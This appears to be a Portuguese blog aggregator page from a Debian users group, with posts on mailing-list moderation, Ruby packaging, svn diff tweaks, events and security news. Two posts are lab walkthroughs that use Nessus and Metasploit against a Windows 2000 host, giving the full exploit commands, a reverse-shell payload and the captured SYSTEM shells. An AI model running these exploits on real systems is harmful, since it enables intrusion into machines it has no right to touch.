Ir para o conteúdo
ou

Thin logo

Tela cheia Sugerir um artigo
 Feed RSS

Grupo de Usuários Debian da Bahia - GUD/BA

7 de Dezembro de 2009, 0:00 , por Software Livre Brasil - | Ninguém está seguindo este artigo ainda.

Seja bem vind@, se você é um debiano (um baiano que usa debian) faça parte de nossa comunidade!


Listadmin: Administrando as filas do mailman de forma rápida e simples

27 de Outubro de 2010, 0:00, por Software Livre Brasil - 0sem comentários ainda

mailman

Além de fazer parte do Sysadmin Team do GNOME também colaboro com o Moderator Team. Esta equipe de 02 pessoas é responsável por moderar todas as 250 listas existentes no Projeto GNOME.

Até pouquissimo tempo este trabalho ultra-chato era feito através do ambiente de gerência Web, só que as coisas estão mudando.

Christer Edwards, atual coordenador dos Sysadmins, recomendou a utilização da ferramenta listadmin. Esta excelente ferramenta facilita a moderação de várias listas de discurssão de forma bastante eficaz através da linha de comando.

Agora vamos ao que interessa:


Instalação

aptitude install listadmin


Configuração

Crie o arquivo .listadmin.ini no diretório home do seu usuário com a seguinte sintaxe:

adminurl – Informe a URL da lista
default – Informe a ação padrão Approve,Reject,Discard,Skip,view Body,Full,jump
log – Informe onde será gravado o arquivo de log

password – Informe a senha da lista
lista@domain.com – Informe o email da lista

Exemplo:

vim ~/.listadmin.ini

adminurl http://mail.gnome.org/mailman/admindb/gnome-love
default discard
log ~/.listadmin.log

password senhalista
gnome-love@gnome.org

Altere as permissões do arquivo

chmod 744 ~/.listadmin.ini

Agora é só correr pro abraço

listadmin

[1/1] ============== gnome-love@gnome.org ==============================
From: skovacs@duaa.duke.edu
Subject: Oct 27/10/2010
Reason: Post by non-member to a members-only list Spam? 2
Approve/Reject/Discard/Skip/view Body/Full/jump #/Undo/Help/Quit [D] ?
Submit changes? [yes]

Desta forma a administração das listas do GNOME ficará simples e rápida.



Encontro Mineiro de Software Livre – 2010

24 de Outubro de 2010, 0:00, por Software Livre Brasil - 0sem comentários ainda

Semana passada participei pela primeira vez do Encontro Mineiro de Software Livre, realizado na Universidade Federal de Uberlândia. Apresentei um mini-curso de Inkscape e uma palestra sobre softwares livres para edição de vídeo.

O evento teve um público bem pequeno, no entanto foi bem produtivo em debates, conversas e contatos. Pude ver uma muito bem humorada palestra sobre geometria computacional com Ole Peter Smith, dinamarquês e professor da Universidade Federal de Goiás. Outra palestra interessante foi a do Wendell Gonçalves sobre software livre e educação, a qual mostrou alguns pontos de vista sobre esse tema que eu ainda não tinha contato.

Além disso, aconteceram duas boas desconferências. Numa delas, discutimos sobre o conceito de Liberdade no Software Livre. Já no sábado, tivemos a presença de dois integrantes do Circuito Fora do Eixo, os quais afirmaram o interesse ideológico da FdE em migrar para software livre, e discutimos como o movimento software livre pode colaborar para isso. Pra quem não conhece, o Circuito Fora do Eixo é uma rede de coletivos culturais de todo o país que trabalha com princípios como a economia solidária e o cooperativismo.

Outro bom momento foi a palestra do Nighto sobre Open Street Map. Quando voltei pra casa, me cadastrei e já fiz várias contribuições. Uma coisa divertida de colaborar com o OSM é relembrar os lugares em que estive em Uberlândia. Também já fiz algumas edições nos mapas de Aracaju e Salvador.

Gostei bastante do EMSL e agradeço a excelente recepção e atenção da turma que organizou o evento (tivemos até coffee break com pão de queijo!). Disponibilizo aqui os slides da palestra “Análise dos softwares livres para edição de vídeo”. Faça o download dos slides em PDF (585kb) ou em ODP (928kb).



Building a Debian package out of a Rubygems' .gem file

17 de Outubro de 2010, 0:00, por Software Livre Brasil - 0sem comentários ainda

This post is sort of a status update on ongoing work in Debian's Ruby packaging infrastructure, i.e. the tools used to package Ruby libraries and applications (not the Ruby interpreters themselves) for Debian. We have recently added two new utilities to ruby-pkg-tools:

  • gem2tgz, a tool to convert .gem files into source tarball suitable for being used as a Debian upstream tarball. This is needed because unfortunately several useful Ruby libraries and applications are only officially released in the .gem format.
  • a ruby buildsystem for debhelper, which will automatically build standards-compliant Debian Ruby packages.

To follow the steps in this post, you'll need to build ruby-pkg-tools from the pkg-ruby-extras team subversion repository (e.g., you need ruby-pkg-tools 0.18, which is not in the archive yet). You can also browse the source.

First you have to download a .gem file. Let's took fast_gettext as an example. Enter a temporary directory and download the latest version of the .gem:

$ wget http://rubygems.org/downloads/fast_gettext-0.5.10.gem

Now we need to convert that .gem file into a source tarball to be used by the Debian package:

$ gem2tgz fast_gettext-0.5.10.gem libfast-gettext-ruby-0.5.10.tar.gz

Then uncompress the source tarball, and change to the extracted source directory:

$ tar xzf libfast-gettext-ruby-0.5.10.tar.gz
$ cd libfast-gettext-ruby-0.5.10/

Inside the source directory, you need the generate the Debian package files. For now, you'll use good old dh_make:

$ dh_make -f ../libfast-gettext-ruby-0.5.10.tar.gz --single

Then we have an almost "ready" Debian package. It still misses several documentation issues that need manual checking, but for the sake of the example in this post it is good enough already.

I normally remove all the example files dh_make generates for us:

$ rm -f debian/*.ex debian/*.EX

The next step is to change debian/rules so that it will use our custom Debhelper build system. It's just a matter of adding an extra argument for the dh call. The final rules file must look like this:

#!/usr/bin/make -f

%: dh --buildsystem=ruby $@

Now we build the package. I normally use debuild for that.

$ debuild

After the build lintian will complain a lot, because our package has lots of unchanged dh_make boilerplate, but as fas as this post is concerned, the point is that the package will install the code correctly.

You can check the contents of the package with debc, to make sure everything will be where it should. Our custom debhelper buildsystem is installing Ruby libraries to /usr/lib/ruby/vendor_ruby, so it will available to all Ruby versions installed.

Now that the package is built, you can install and test it:

$ sudo dpkg -i ../libfast-gettext-ruby_0.5.10-1_i386.deb
[...]
$ irb -rfast_gettext
>> FastGettext.add_text_domain 'mutt', :path => '/usr/share/locale'; 1
=> 1
>> FastGettext.text_domain = 'mutt' => "mutt" >> FastGettext.locale = 'pt_BR' => "pt_BR" >> include FastGettext::Translation => Object >> _('Delete') => "Remover"

I tried the above with both irb (currently Ruby 1.8's irb) and irb1.9.1 (Ruby 1.9.2's irb), and it worked fine.

This custom buildsystem still misses proper handling for some special cases:

  • C extensions. They must be installed under /usr/lib/ruby/vendor_ruby/${RUBY_VERSION}/${ARCH}/
  • Libraries that are specific to a single Ruby version. This is the case for example of libraries that got included in Ruby 1.9.x itself but are still useful for Ruby 1.8, or even C extensions that do not compile under Ruby 1.9.x. Those libraries must be installed under /usr/lib/ruby/vendor_ruby/${RUBY_VERSION}/ for pure-Ruby libraries and /usr/lib/ruby/vendor_ruby/${RUBY_VERSION}/${ARCH}/ for C extensions.
  • Applications. Normally an application should use a single and well-known Ruby version, e.g. either Ruby 1.8 or Ruby 1.9.2. So that no matter which is the default Ruby version (the one started when ruby is invoked), the application will work the same.

Next steps include providing a dh-make-ruby tool that will convert the extracted tarball into a proper Ruby Debian package. This tool will eliminate the need for all the manual steps listed above after the gem2tgz invocation and before the package build (debuild).

dh-make-ruby will use the Rubygems metadata that gem2tgz puts inside the generated tarball to automatically fill important files in the package, such as debian/control and debian/copyright. It will also generate a debian/rules that is ready to go for most packages. Hopefull the generated source package will also as lintian-clean as possible.

There is an existing implementation of dh-make-ruby out there, which will be surely taken into account when building our own.

There is also lots of documentation that needs to be written/updated, and all help we get will be appreciated.



A better svn diff

6 de Outubro de 2010, 0:00, por Software Livre Brasil - 0sem comentários ainda

Since I started using git, every time I need to use Subversion again I suffer. The output of `git diff` is so nice compared to the one produced `svn diff` that it hurts. I've alredy been struggling with that previously.

Now I think I've achieved the perfect solution to make `svn diff` behave just like `git diff`. I've documented it in this post hoping to help other poor souls like me who still have to use Subversion now and then.

Step 1: install colordiff. It's installed on Debian, so the installation required me no effort at all.

Step2 (optional): configure colordiff to use your preferred set of colors. My ~/.colordiffrc contains the following, to match the same colors used by default by `git diff`:

banner=no
color_patches=no
plain=off
newtext=darkgreen
oldtext=darkred
diffstuff=white
cvsstuff=darkyellow

Step 3: create a script to be called by Subversion when running `svn diff`. In my case, I called it svn-diff and stored it in ~/bin (which is in my $PATH), but you can put it in /usr/local/bin or any other directory that is in your $PATH. The contents of ~/bin/svn-diff is the following:

#!/bin/sh  colordiff -u -L "${3}" -L "${5}" "${6}" "${7}"
 

 

After creating the script, you need to make it executable:

$ chmod +x ~/bin/svn-diff

Step 4: tell Subversion to use your script instead of plain diff on `svn diff`. To do that, locate the "helpers" section in your Subversion configuration file (~/.subversion/config), and set the diff-cmd setting to the name you gave to your custom script (svn-diff in my case):

[helpers]
diff-cmd = svn-diff

There is only one thing missing with regard to `git diff`: the nice pager behaviour. Git invokes that system pager in a way that less will receives the options "-FRSX". These options make less exit imediately if the output fits in one terminal screen and output the ANSI sequences (and thus colors) generated by colordiff in raw format, among other things. I couldn't find a way to emulate this: since `svn diff` will call our custom diff command once for each changed file, we can't call the pager inside svn-diff. A comprimise is doing `svn diff | less -FRSX` , or setting the LESS environment variable to 'FRSX' and doing simply `svn diff | less`.

That's it! Now you can almost forget you are using Subversion (until you need to do some merging).



Usando o Nessus plugin com o MySQL e o db_autopwn no Metasploit

1 de Outubro de 2010, 0:00, por Software Livre Brasil - 0sem comentários ainda

No post anterior apresentei como a integração entre o Nessus e o MSF pode tornar nossa vida bastante interessante.

Agora irei rebuscar os testes usando o MySQL para manter os alvos e suas vulnerabilidades em uma base de dados, explorando-as de forma automatizada com o db_autopwn.

O ambiente dos testes continuará o mesmo:

Host Debian com o Nessus, Metasploit e o MySQL
Host Windows 2000

Pré-requisito para os testes:

Possuir os seguintes itens instalados:

* libdbd-mysql-ruby1.8
* Módulo activerecord ( gem install activerecord )

Preparando o ambiente

Inicei o driver para MySQL no MSF

msf> db_driver mysql

Conectei o banco e criei uma base de dados chamada msf

msf> db_connect msf:******@localhost/msf

Importei o report do Nessus para o banco

msf> nessus_report_get af55d200-77a4-fe0e-7baa-90a11eeab4839ecaf20114aac8b0

Listando as portas apartir da base de dados msf


msf> db_services

Services
========

created_at info name port proto state updated_at Host Workspace
———- —- —- —- —– —– ———- —- ———
Fri Oct 01 12:06:03 UTC 2010 ftp 21 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
Fri Oct 01 12:06:03 UTC 2010 epmap 135 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
ri Oct 01 12:06:03 UTC 2010 135 udp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
Fri Oct 01 12:06:03 UTC 2010 netbios-ns 137 udp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
Fri Oct 01 12:06:03 UTC 2010 smb 139 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
Fri Oct 01 12:06:03 UTC 2010 cifs 445 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
Fri Oct 01 12:06:03 UTC 2010 dce-rpc 1025 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
Fri Oct 01 12:06:03 UTC 2010 dce-rpc 1028 udp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
Fri Oct 01 12:06:03 UTC 2010 www 5800 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
Fri Oct 01 12:06:03 UTC 2010 www 5801 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
Fri Oct 01 12:06:03 UTC 2010 vnc 5900 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
Fri Oct 01 12:06:03 UTC 2010 vnc 5901 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default

Listando as vulnerabilidades apartir da base de dados msf


msf > db_vulns

[*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=5901 proto=tcp name=NSS-19288 refs=
[*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=5901 proto=tcp name=NSS-10342 refs=
[*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=21 proto=tcp name=NSS-22964 refs=
[*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=5900 proto=tcp name=NSS-19288 refs=
[*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=5900 proto=tcp name=NSS-10342 refs=
[*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=5801 proto=tcp name=NSS-24260 refs=
[*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=5800 proto=tcp name=NSS-10758 refs=
[*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=5800 proto=tcp name=NSS-10107 refs=
[*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=5800 proto=tcp name=NSS-43111 refs=
[*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=1028 proto=udp name=NSS-10736 refs=
….


O db-autopwn

O db_autopwn escaneará a base de dados e criará uma lista de módulos específicos para cada vulnerabilidade existente no alvo. A criação destes módulos ocorrerá de 2 formas:

1 – Os exploits serão carregados através da análise da lista de vulnerabilidades. Este tipo de cross-referência depende de alguns padrões como OSVDB, Bugtraq, e CVE para vincular o exploit ao alvo.

2 – Usa portas padrões associadas a cada exploit para localizar os alvos que estão rodando o mesmo serviço.


msf > db_autopwn

[*] Usage: db_autopwn [options]
-h Display this help text
-t Show all matching exploit modules
-x Select modules based on vulnerability references
-p Select modules based on open ports
-e Launch exploits against all matched targets
-r Use a reverse connect shell
-b Use a bind shell on a random port (default)
-q Disable exploit module output
-R [rank] Only run modules with a minimal rank
-I [range] Only exploit hosts inside this range
-X [range] Always exclude hosts inside this range
-PI [range] Only exploit hosts with these ports open
-PX [range] Always exclude hosts with these ports open
-m [regex] Only run modules whose name matches the regex
-T [secs] Maximum runtime for any exploit in seconds


Hora da ação :P


msf > db_autopwn -p -t -e

[*] Analysis completed in 7 seconds (0 vulns / 0 refs)
[*]
[*] ================================================================================
[*] Matching Exploit Modules
[*] ================================================================================
[*] 192.168.0.6:5800 exploit/windows/vnc/winvnc_http_get (port match)
[*] 192.168.0.6:445 exploit/windows/smb/ms06_066_nwapi (port match)
[*] 192.168.0.6:21 exploit/windows/ftp/filecopa_list_overflow (port match)
[*] 192.168.0.6:21 exploit/windows/ftp/servu_mdtm (port match)
[*] 192.168.0.6:21 exploit/windows/ftp/easyfilesharing_pass (port match)
[*] 192.168.0.6:445 exploit/windows/smb/netidentity_xtierrpcpipe (port match)
[*] 192.168.0.6:445 exploit/windows/brightstor/ca_arcserve_342 (port match)
[*] 192.168.0.6:445 exploit/linux/samba/trans2open (port match)
….

================================================================================
[*] (1/81 [0 sessions]): Launching exploit/windows/vnc/winvnc_http_get against 192.168.0.6:5800…
[*] (2/81 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwapi against 192.168.0.6:445…
[*] (3/81 [0 sessions]): Launching exploit/windows/ftp/filecopa_list_overflow against 192.168.0.6:21…
[*] (4/81 [0 sessions]): Launching exploit/windows/ftp/servu_mdtm against 192.168.0.6:21…
[*] (5/81 [0 sessions]): Launching exploit/windows/ftp/easyfilesharing_pass against 192.168.0.6:21…
[*] (6/81 [0 sessions]): Launching exploit/windows/smb/netidentity_xtierrpcpipe against 192.168.0.6:445…
[*] (7/81 [0 sessions]): Launching exploit/windows/brightstor/ca_arcserve_342 against 192.168.0.6:445…
[*] (8/81 [0 sessions]): Launching exploit/linux/samba/trans2open against 192.168.0.6:445…
[*] (9/81 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwwks against 192.168.0.6:139…
….

[*] (81/81 [0 sessions]): Waiting on 35 launched modules to finish execution…
[*] Meterpreter session 1 opened (192.168.0.3:46168 -> 192.168.0.6:15979) at Fri Oct 01 10:37:39 -0300 2010
[*] Meterpreter session 2 opened (192.168.0.3:43223 -> 192.168.0.6:24353) at Fri Oct 01 10:37:40 -0300 2010
[*] (81/81 [2 sessions]): Waiting on 22 launched modules to finish execution…
[*] (81/81 [2 sessions]): Waiting on 12 launched modules to finish execution…
[*] (81/81 [2 sessions]): Waiting on 11 launched modules to finish execution…
[*] (81/81 [2 sessions]): Waiting on 11 launched modules to finish execution…
[*] (81/81 [2 sessions]): Waiting on 11 launched modules to finish execution…
….

[*] The autopwn command has completed with 2 sessions
[*] Enter sessions -i [ID] to interact with a given session ID
[*]
[*] ================================================================================

Active sessions
===============

Id Type Information Connection Via
— —- ———– ———- —

1 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ W2KVITIMA 192.168.0.3:46168 -> 192.168.0.6:15979 exploit/windows/dcerpc/ms03_026_dcom
2 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ W2KVITIMA 192.168.0.3:43223 -> 192.168.0.6:24353 exploit/windows/dcerpc/ms03_026_dcom

[*] ================================================================================

Iniciando a sessão


msf > sessions -i 1

[*] Starting interaction with 1…


meterpreter > execute -i -H -f cmd.exe

Process 736 created.
Channel 1 created.

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

C:\WINNT\system32>


Observações importantes:


0 – Isso não é magia é tecnologia

1 – Estes testes são de caráter totalmente experimental;

2 – O uso destas ferramentas e ações requerem alguns conhecimentos prévios como:

* Entender sistemas operacionais;
* Entender profundamente o protocolo TCP/IP;
* Entender o funcionamento dos exploits, payloads, shellcodes e etc;
* Entender a dinâmica das causas e os impactos das vulnerabilidades;
* Usar estes conhecimentos de forma ética;



Brincando com o plugin do Nessus para o Metasploit

28 de Setembro de 2010, 0:00, por Software Livre Brasil - 22 comentários

Recentemente o desenvolvedor Zate Berg disponibilizou um plug-in do Nessus para o Metasploit Framework ele está disponivel na versão em desenvolvimento do MSF.

Para os testes utilizei o seguinte cenário:

* Host Debian com Nessus e Metasploit
* Host Alvo com Windows 2000 “bugado até a alma”

Inicialmente atualizei o MSF e o Nessus e depois parti para a diversão

cd /tmp/pentest_tools/trunk

svn update

/opt/nessus/sbin/nessus-update-plugins

/opt/nessus/sbin/nessus-service &

./msconsole

| | | | (_) |
_ __ ___ ___| |_ __ _ ___ _ __ | | ___ _| |_
| ‘_ ` _ \ / _ \ __/ _` / __| ‘_ \| |/ _ \| | __|
| | | | | | __/ || (_| \__ \ |_) | | (_) | | |_
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
| |
|_|

=[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ — –=[ 592 exploits - 302 auxiliary
+ -- --=[ 225 payloads - 27 encoders - 8 nops
=[ svn r10505 updated today (2010.09.28)

msf>

Diversão :)

Carregando o Nessus plug-in

msf> load nessus

[*] Nessus Bridge for Nessus 4.2.x
[+] Type nessus_help for a command listing
[*] Successfully loaded plugin: nessus

Conectando…

msf> nessus_connect localhost:8834 ok

[+] Username:
alexos
[+] Password:
***********
[*] Connecting to https://localhost:8834/ as alexos
[*] Authenticated

Listando as políticas existentes no Nessus

msf> nessus_policy_list

[+] Nessus Policy List

ID Name Owner visability
– —- —– ———-
1 attack alexos private

Iniciando a varredura

msf> nessus_scan_new 1 alexoscorelabs 192.168.0.6

[*] Creating scan from policy number 1, called “alexoscorelabs” and scanning 192.168.0.6
[*] Scan started. uid is af55d200-77a4-fe0e-7baa-90a11eeab4839ecaf20114aac8b0

Finalizada a verredura é hora de checar o relatório

msf> nessus_report_hosts_ports 192.168.0.6 af55d200-77a4-fe0e-7baa-90a11eeab4839ecaf20114aac8

[+] Host Info

Port Protocol Severity Service Name Sev 0 Sev 1 Sev 2 Sev 3
—- ——– ——– ———— —– —– —– —–
0 icmp 1 general 0 2 0 0
0 tcp 3 general 0 9 0 1
0 udp 1 general 0 1 0 0
21 tcp 3 ftp 1 4 2 2
135 tcp 3 epmap 1 1 0 1
135 udp 3 epmap? 0 0 0 1
137 udp 1 netbios-ns 0 1 0 0
139 tcp 1 smb 1 1 0 0
445 tcp 3 cifs 1 10 2 12
1025 tcp 3 dce-rpc 1 1 0 1
1028 udp 1 dce-rpc 0 1 0 0
5800 tcp 1 www 1 4 0 0
5801 tcp 1 www 1 3 0 0
5900 tcp 3 vnc 1 2 0 1
5901 tcp 1 vnc 1 3 0 0

Obtendo informações sobre as vulnerabilidades existentes na porta 445 ( smb ) do alvo

msf> nessus_report_host_detail 192.168.0.6 445 tcp af55d200-77a4-fe0e-7baa-90a11eeab4839ecaf20114aac8b0

[+] Port Info

Port Severity PluginID Plugin Name CVSS2 Exploit? CVE Risk Factor CVSS Vector
—- ——– ——– ———– —– ——– — ———– ———–
cifs (445/tcp) 1 10736 DCE Services Enumeration none . . None .
cifs (445/tcp) 1 10785 SMB NativeLanManager Remote System Information Disclosure none . . None .
cifs (445/tcp) 1 10394 SMB Log In Possible none false CVE-1999-0504 None .
cifs (445/tcp) 1 11011 SMB Service Detection none . . None .
cifs (445/tcp) 1 10395 SMB Shares Enumeration none . . None .
cifs (445/tcp) 1 26920 Windows SMB NULL Session Authentication none false CVE-1999-0519 None .
cifs (445/tcp) 1 17651 Obtains the password policy none . . None .
cifs (445/tcp) 3 22034 MS06-035: Vulnerability in Server Service Could Allow Remote Code Execution (917159) (uncredentialed check) 7.5 true CVE-2006-1314 High CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P
cifs (445/tcp) 3 19407 MS05-043: Vulnerability in Printer Spooler Service Could Allow Remote Code Execution (896423) (uncredentialed check) 10.0 true CVE-2005-1984 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
cifs (445/tcp) 3 12209 MS04-011: Security Update for Microsoft Windows (835732) (uncredentialed check) 10.0 true CVE-2003-0533 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
cifs (445/tcp) 3 12054 MS04-007: ASN.1 Vulnerability Could Allow Code Execution (828028) (uncredentialed check) 10.0 true CVE-2003-0818 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
cifs (445/tcp) 1 10859 SMB LsaQueryInformationPolicy Function SID Enumeration none true CVE-2000-1200 None .
cifs (445/tcp) 3 22194 MS06-040: Vulnerability in Server Service Could Allow Remote Code Execution (921883) (uncredentialed check) 10.0 true CVE-2006-3439 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C

cifs (445/tcp) 3 19408 MS05-039: Vulnerability in Plug and Play Service Could Allow Remote Code Execution (899588) (uncredentialed check) 10.0 true CVE-2005-1983 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C

cifs (445/tcp) 3 21193 MS05-047: Plug and Play Remote Code Execution and Local Privilege Elevation (905749) (uncredentialed check) 10.0 false CVE-2005-2120 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
cifs (445/tcp) 2 18602 SMB svcctl MSRPC Interface SCM Service Enumeration 5.0 false CVE-2005-2150 Medium CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N
cifs (445/tcp) 2 18585 SMB Service Enumeration via \srvsvc 5.0 false CVE-2005-2150 Medium CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N
cifs (445/tcp) 3 35362 MS09-001: Microsoft Windows SMB Vulnerabilities Remote Code Execution (958687) (uncredentialed check) 10.0 . CVE-2008-4834 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
cifs (445/tcp) 1 26917 SMB Registry : Nessus Cannot Access the Windows Registry none . . None .
cifs (445/tcp) 3 18502 MS05-027: Vulnerability in SMB Could Allow Remote Code Execution (896422) (uncredentialed check) 10.0 false CVE-2005-1206 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
cifs (445/tcp) 3 11835 MS03-039: Microsoft RPC Interface Buffer Overrun (824146) (uncredentialed check) 10.0 true CVE-2003-0715 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
cifs (445/tcp) 1 10860 SMB Use Host SID to Enumerate Local Users none true CVE-2000-1200 None .
cifs (445/tcp) 3 11808 MS03-026: Microsoft RPC Interface Buffer Overrun (823980) 10.0 true CVE-2003-0352 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
cifs (445/tcp) 3 11110 MS02-045: Microsoft Windows SMB Protocol SMB_COM_TRANSACTION Packet Remote Overflow DoS (326830) 7.5 true CVE-2002-0724 High CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P

Usando o MSF explorei a vulnerabilidade MS05-039: Vulnerability in Plug and Play Service Could Allow Remote Code Execution

msf> use exploit/windows/smb/ms05_039_pnp

msf exploit(ms05_039_pnp)> set RHOST 192.168.0.6

msf exploit(ms05_039_pnp)> set PAYLOAD windows/shell/reverse_tcp

msf exploit(ms05_039_pnp)> set LHOST 192.168.0.3

msf exploit(ms05_039_pnp)> exploit

[*] Started reverse handler on 192.168.0.3:4444
[*] Connecting to the SMB service…
[*] Binding to 8d9f4e40-a03d-11ce-8f69-08003e30051b:1.0@ncacn_np:192.168.0.6[\browser] …
[*] Bound to 8d9f4e40-a03d-11ce-8f69-08003e30051b:1.0@ncacn_np:192.168.0.6[\browser] …
[*] Calling the vulnerable function…
[*] Sending stage (240 bytes) to 192.168.0.6
[*] Command shell session 1 opened (192.168.0.3:4444 -> 192.168.0.6:1184) at Tue Sep 28 17:24:01 -0300 2010
[*] Server did not respond, this is expected
[*] The server should have executed our payload


Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

C:\WINNT\system32>

C:\WINNT\system32> ipconfig
ipconfig

Windows 2000 IP Configuration

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.0.6
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.0.2

Estes MSF add-ons serão sempre bem-vindos, outra integração interessante é a do Metasploit com o Ethercap para testes de MITM.



LinguÁgil 2010

21 de Setembro de 2010, 1:03, por Software Livre Brasil - 0sem comentários ainda

Banner-horizontal-linguagil

Nos dias 16, 17 e 18 de setembro, aconteceu a segunda edição do LinguÁgil. Este ano, o evento foi realizado pelos grupos de usuários Java Bahia, PHP Bahia, Rails Bahia, Agile Bahia, Python Bahia, a Unijorge e a Colivre (cooperativa da qual sou sócia) com o apoio e patrocínio ouro e prata de algumas empresas.

Infelizmente, não pude participar dos cursos neste ano (ano passado participei de 2 :D), mas participei do Dojo Noosfero no dia 17 e assisti as palestras do dia 18.

Nunca tinha participado de um Dojo, mas como era com o Noosfero, apareci lá :D
Para saber um pouco sobre Dojo, tem um post de Danilo Sato que explica como funciona.

Quando começou achei estranha a ideia de ir para a frente de todo mundo e programar com todos os outros olhando e comentando. Programo em par e já programei em trio, mas não com a tela do computador projetada num telão.
Logo no início, fizeram uma lista com os nomes das pessoas que queriam participar como piloto e co-piloto. Não coloquei meu nome, preferi ser só plateia...

Depois que todos da lista já tinham participado, Serge, organizador e membro do Java Bahia, me convidou para participar e acabei aceitando. Faltava pouco para o desafio ser resolvido, então ainda pude contribuir com o código (terceiro aplicou o patch no repositório do Noosfero no dia 20/09).

Não foi estranho como eu achei que seria, na verdade, até gostei :)

As palestras foram muito boas e, em breve, serão disponibilizadas para todos assistirem.
Após as palestras, teve o "Boteco Linguágil" com @alegomes: os palestrantes do dia ficaram na mesa enquanto @alegomes passeava na sala conduzindo a discussão e incentivando a plateia a contribuir com a discussão e interagir com os palestrantes.

O evento foi muito bom e tenho certeza que o próximo será ainda melhor.

Provavelmente estarei lá de novo :D



DLL Hijacking também afeta algumas Linux distros

27 de Agosto de 2010, 0:00, por Software Livre Brasil - 0sem comentários ainda

Durante esta semana vimos o “caos” reinando no império do tio Bill. Devido a falhas em DLLs no sistema da Microsoft foram encontradas cerca de 30 vulnerabilidades em seus produtos.

dll

HDMoore e sua trupe imediatamente atualizaram o svn do Metasploit com o exploit para explorar está vulnerabilidade. Só que no estilo “Nóis morde, mas nóis também assopra” foi criado uma ferramenta de auditoria, assim usuários do sistema de Redmond podem auditar seus sistemas em busca de falhas.

O site Exploitdb também disponibilizou dezenas de exploits para explorar estas falhas, usem com muita cautela.

Porém foi descoberto que algumas distribuições Linux possuem uma vulnerabilidade similar, a falha deu início através de um patch do Debian ano passado. Distribuições como Ubuntu e Fedora também estão vulneráveis de acordo com as discussões iniciadas pelo pesquisador em segurança Tim Brown.

Segundo Brown, a falha foi introduzida num patch do Debian lançado em março de 2009.

Na lista de discursão Full-Disclosure um usuário informou que consegiu reproduzir a falha no Apache CoucheDB rondando no Ubuntu 10.04 e o time de segurança do Fedora informou que o sistema realmente encontra-se vulnerável.

ms

No Linux este bug não apresenta-se na mesma escala que nos sistemas Windows já que a nele a falha é de arquitetura surgindo desde 2002.

Segundo o boletim MS10-aug lançado 10 de agosto de 2010 a Microsft informa que já foram criadas as correções para estas falhas e trazem maiores informações juntamente com links para ferramentas de detecção.

Leia mais:

Some Linux Distros Vulnerable to Version of DLL Hijacking Bug
DLL Hijacking: Facts and Fiction
Exploit Code, List of Apps Vulnerable to DLL Hijacking Hit the Web



A Festa de Aniversário do Debian na Web

19 de Agosto de 2010, 0:00, por Software Livre Brasil - 0sem comentários ainda

Version of that post in other languages, using google translate.

Antes de tudo, sincera desculpa se ficou uma postagem grande, também por qualquer error ortográfico, conteúdo mal explicado, algum crédito esquecido ou algo que não lhe agrade. Quero que saiba que esta postagem foi redigida o mais rápido que posso, isso porque já esta muito “tarde” e não tenho muito hábito ou tempo para postar.

Esta postagem é um relato pessoal da grande festa virtual feita para o Debian por usuários do debian! Quem não sabe, o Debian talvez seja a maior e melhor distribuição do Mundo, seja GNU/Linux ou GNU/, é o sistema operacional universal. Alguns números dessa grande comunidade de pessoas você pode encontrar no cartão comemorativo dos 17 anos do Debian.

